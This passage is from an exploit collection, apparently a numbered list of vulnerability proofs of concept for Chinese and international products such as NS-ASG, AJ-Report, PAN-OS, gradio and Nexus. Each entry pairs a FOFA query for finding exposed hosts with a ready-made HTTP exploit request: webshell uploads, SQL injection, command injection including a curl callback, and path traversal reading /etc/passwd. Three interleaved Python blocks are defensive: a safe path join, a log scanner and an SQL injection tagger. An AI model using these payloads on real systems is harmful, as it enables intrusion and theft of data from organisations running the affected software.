FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
The injection sits in the IPAddr field of a JSON document that is itself a string inside the messagecontent array of the jsoncontent form parameter.
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
The SESSID cookie value is used as a file name: the .. segments place the file under the telemetry directory, and the backtick-quoted command runs when that directory is processed. Replace <dnslog-address> with your own callback host.
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
The url parameter is base64 (cnRzcDovL2EK decodes to rtsp://a plus a newline); the transport parameter carries the injected shell command, URL-encoded.
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

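Items 126, 129 and 147 are one primitive: a user-supplied path fragment (../../../../../etc/passwd after /static/, file_name=../../../etc/passwd, /webeditor/../../../windows/win.ini) is joined onto a server directory and the result is never checked against that directory. The Python below is an added example, not code from aiohttp, ColdFusion or RaidenMAILD: resolve_naive reproduces the vulnerable join, and check_request shows the check a static-file handler needs (percent-decode, normalise separators, resolve symlinks, then require the real path to lie under the real root). The root directory /srv/www/static and the request strings are assumed values.

```python
"""Path traversal: the vulnerable join next to the hardened check.

Added example for items 126, 129 and 147; root and request paths are assumed.
"""
import posixpath
from pathlib import Path
from urllib.parse import unquote


def resolve_naive(root, requested):
    """Vulnerable: joins the URL path onto root and trusts normpath.
    normpath walks '..' out of root: ('/srv/www/static', '../../etc/passwd') -> '/srv/etc/passwd'."""
    return posixpath.normpath(posixpath.join(root, requested))


def check_request(root, requested):
    """Hardened resolution. Returns {'allowed': bool, 'resolved': real path}."""
    base = Path(root).resolve()
    # Percent-decode first ('%2e%2e' is '..'), treat backslashes as separators
    # (the RaidenMAILD target is Windows), and drop a leading '/' so the join
    # cannot be turned into an absolute path.
    rel = unquote(requested).replace("\\", "/").lstrip("/")
    # resolve() collapses '..' and follows symlinks, so a link inside the static
    # directory that points outside it is caught as well.
    target = (base / rel).resolve()
    try:
        # Component-wise containment check; a string startswith() would accept
        # a sibling directory such as /srv/www/static2.
        target.relative_to(base)
        allowed = True
    except ValueError:
        allowed = False
    return {"allowed": allowed, "resolved": str(target)}


def safe_join(root, requested):
    """What the handler should call: returns the file to serve or raises."""
    result = check_request(root, requested)
    if not result["allowed"]:
        raise PermissionError(f"{requested!r} resolves to {result['resolved']}, outside {root}")
    return result["resolved"]


if __name__ == "__main__":
    root = "/srv/www/static"  # assumed static directory
    for req in ("../../../../../etc/passwd",             # item 126, the part after /static/
                "../../../../../../../etc/passwd",       # item 129, file_name parameter
                "%2e%2e/%2e%2e/%2e%2e/windows/win.ini",  # item 147, percent-encoded variant
                "css/site.css"):
        print(f"{req!r:45} naive={resolve_naive(root, req)!r:22} checked={check_request(root, req)}")
```

The check is deliberately done on the resolved filesystem path rather than on the URL string: rejecting the literal substring ".." misses percent-encoded, overlong and backslash variants, while comparing real paths catches all of them plus symlinks.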
148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
The ;swagger-ui/ path parameter gets the request past the authentication filter, and the validationRules value is evaluated as a script with Java classes (java.lang.ProcessBuilder) reachable.
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

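The three AJ-Report requests above and the TeamCity requests in item 132 bypass authentication the same way: the path the authentication filter inspects carries a ;-delimited path parameter (;swagger-ui/, ;.jsp) or a .. segment after a prefix the filter treats as public, while the servlet container strips or normalises that part before routing, so the request reaches a privileged handler. The Python below is an added example, not code from either project or from the original post: it parses constructed access-log lines (Common Log Format is assumed) and reports, per request, the path the application would actually route to and the indicators found. PUBLIC_PREFIXES holds the three prefixes listed for CVE-2024-27199; extend it for the product you are checking.

```python
"""Spot ';' path-parameter and '..'-after-public-prefix bypasses in access logs.

Added example for items 132 and 149-151; log lines are constructed, CLF assumed.
"""
import posixpath
import re
from urllib.parse import unquote

# Common Log Format; adapt the regex to your proxy's format.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Prefixes an auth filter lets through unauthenticated; these three are the ones
# used against TeamCity (CVE-2024-27199). Extend for other products.
PUBLIC_PREFIXES = ("/res/", "/update/", "/.well-known/acme-challenge/")


def _has_path_param(path):
    """True if any segment carries ';param' (servlet path parameter / Spring matrix variable)."""
    return any(";" in seg for seg in path.split("/"))


def _strip_path_params(path):
    """Drop ';...' from every segment and collapse empty segments, as the container does before routing."""
    segs = [seg.partition(";")[0] for seg in path.split("/")]
    return "/" + "/".join(s for s in segs if s)


def _query_params(qs):
    params = {}
    for pair in qs.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[unquote(key)] = unquote(value)
    return params


def analyse_target(target):
    """Return {'indicators': [...], 'effective': path} for one request-target."""
    raw_path, _, qs = target.partition("?")
    path = unquote(raw_path)
    params = _query_params(qs)
    indicators = []

    # TeamCity-specific (CVE-2024-27198): the 'jsp' parameter names the resource the
    # request is forwarded to, so that, not the request path, is what gets served.
    forwarded = params.get("jsp")
    if forwarded is not None:
        indicators.append("jsp-forward")

    if _has_path_param(path) or (forwarded and _has_path_param(forwarded)):
        indicators.append("path-parameter")
    if ".." in path.split("/") or (forwarded and ".." in forwarded.split("/")):
        indicators.append("dot-segment")

    # What the application routes to once path parameters are stripped and '..' resolved.
    effective = posixpath.normpath(_strip_path_params(forwarded or path))

    for prefix in PUBLIC_PREFIXES:
        if path.startswith(prefix) and not effective.startswith(prefix):
            indicators.append("escapes-public-prefix")
            break
    return {"indicators": indicators, "effective": effective}


def scan_log(lines):
    """Run analyse_target over log lines; return the entries that carry any indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        result = analyse_target(m["target"])
        if result["indicators"]:
            hits.append({"src": m["src"], "method": m["method"], "target": m["target"], **result})
    return hits


# Constructed sample: four requests shaped like the page's POCs, then two benign ones.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Mar/2024:12:00:01 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512',
    '10.0.0.5 - - [04/Mar/2024:12:00:02 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 8800',
    '10.0.0.6 - - [04/Mar/2024:12:00:03 +0000] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 231',
    '10.0.0.6 - - [04/Mar/2024:12:00:04 +0000] "GET /;swagger-ui/dataSource/pageList?showMoreSearch=false HTTP/1.1" 200 231',
    '10.0.0.7 - - [04/Mar/2024:12:00:05 +0000] "GET /res/img/logo.png HTTP/1.1" 200 1200',
    '10.0.0.7 - - [04/Mar/2024:12:00:06 +0000] "GET /login.html HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["src"]} {hit["method"]} {hit["target"]} -> {hit["effective"]} {hit["indicators"]}')
```

Reporting the effective path is the useful part for triage: a 200 on /pwned or on /res/... looks harmless in a log, while /app/rest/users and /admin/diagnostic.jsp do not.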
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), LoadMaster <= 7.2.54.8 (LTSF), LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the Basic-auth username ';ls;' with password doesnotmatter; the username carries the injected shell command.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file under its cache (component_id comes from step 1)
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
Time-based injection in the query.gsdwid field of the JSON body; PG_SLEEP means the backend is PostgreSQL.
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

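Items 131, 134, 135, 137 to 141 and 154 are all SQL injection, but the injected string arrives in different carriers: a plain query parameter (137 to 140), a form field (141), an orderBy value (131), a JSON body (154) and, in item 134, a JSON document inside a form field whose messagecontent array holds a second JSON document as a string. A detector that only looks at top-level parameters misses that last case. The Python below is an added example, not code from any of these products: it walks form, JSON and JSON-in-string values down to their string leaves and tags each leaf with the injection technique its syntax matches. The request bodies are the page's own payloads, embedded here as constructed test inputs.

```python
"""Tag SQL-injection syntax in query strings, form bodies and (nested) JSON bodies.

Added example for items 131, 134, 135, 137-141 and 154; inputs are constructed from the page's payloads.
"""
import json
import re
from urllib.parse import parse_qsl

# Technique -> syntax that gives it away. Order only affects reporting order.
TECHNIQUES = [
    ("time-based", re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("error-based", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("comment-terminator", re.compile(r"--[\s-]|--$|/\*|#\s*$")),
]


def iter_strings(value, path=""):
    """Yield (path, text) for every string leaf, descending into JSON embedded in strings."""
    if isinstance(value, dict):
        for key, item in value.items():
            yield from iter_strings(item, f"{path}.{key}" if path else str(key))
    elif isinstance(value, list):
        for i, item in enumerate(value):
            yield from iter_strings(item, f"{path}[{i}]")
    elif isinstance(value, str):
        stripped = value.strip()
        nested = None
        if stripped and stripped[0] in "{[":
            try:
                nested = json.loads(stripped)      # item 134: JSON text inside a JSON string
            except ValueError:
                nested = None
        if isinstance(nested, (dict, list)):
            yield from iter_strings(nested, path)
        else:
            yield path, value


def scan_value(value):
    """Return one hit per string leaf whose syntax matches a technique."""
    hits = []
    for path, text in iter_strings(value):
        techniques = [name for name, rx in TECHNIQUES if rx.search(text)]
        if techniques:
            hits.append({"param": path, "techniques": techniques, "value": text})
    return hits


def scan_query_string(qs):
    # parse_qsl percent-decodes and turns '+' into space, as the server does.
    return scan_value(dict(parse_qsl(qs, keep_blank_values=True)))


def scan_request(content_type, body):
    """Pick the decoder from Content-Type, then scan every string leaf."""
    if content_type.startswith("application/json"):
        return scan_value(json.loads(body))
    if content_type.startswith("application/x-www-form-urlencoded"):
        return scan_query_string(body)
    return []


# Constructed inputs copied from the page's requests.
NS_ASG_BODY = r'''jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}'''
TIANWEIER_BODY = '''{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}'''
KELIXUN_QUERY = "uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF"
AJAX_USERS_BODY = "dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -"
MINI_TMALL_QUERY = "orderBy=7,if((length(database())=11),SLEEP(3),0)"

if __name__ == "__main__":
    for label, hits in (
        ("NS-ASG form+JSON", scan_request("application/x-www-form-urlencoded", NS_ASG_BODY)),
        ("Tianweier JSON", scan_request("application/json", TIANWEIER_BODY)),
        ("Kelixun query", scan_query_string(KELIXUN_QUERY)),
        ("ajax_users form", scan_request("application/x-www-form-urlencoded", AJAX_USERS_BODY)),
        ("Mini-Tmall query", scan_query_string(MINI_TMALL_QUERY)),
    ):
        for hit in hits:
            print(f"{label}: {hit['param']} -> {hit['techniques']}")
```

The parameter path in each hit (jsoncontent.messagecontent[0].IPAddr, query.gsdwid) is what to hand to the developers: it names the exact field that needs a parameterised query, which is the fix for every item in this group.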
155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response echoes the stored path; access it at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) medical imaging archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
